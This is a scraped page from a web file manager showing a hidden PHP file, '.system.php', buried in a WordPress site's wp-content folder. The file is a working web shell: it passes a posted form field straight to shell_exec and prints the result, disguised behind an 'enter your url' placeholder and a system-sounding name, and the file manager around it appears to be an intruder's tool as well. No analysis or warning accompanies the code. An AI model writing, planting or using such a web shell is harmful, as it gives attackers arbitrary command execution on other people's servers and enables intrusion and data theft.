File manager - Edit - /home/wsardargurjari/public_html/wp-content/system/system/.system.php
Back
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $command = trim($_POST['original']); $output=shell_exec($command); } ?> <html> <head> <style> .box{ width:80%; background:black; padding:50px; border-radius:20px; box-shadow: 2px 6px rgba(0,0,0,0); margin-top:20px; text-align: left; color:white; } </style> </head> <body> <form method="post"> <center> <input type="text" name="original" placeholder="enter your url" required ><br> <button type='submit'>send</button><br> </center> </form> <div class='box'> <per><?php echo $output;?></per> </div> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.3.33 | Generation time: 0 |
proxy
|
phpinfo
|
Settings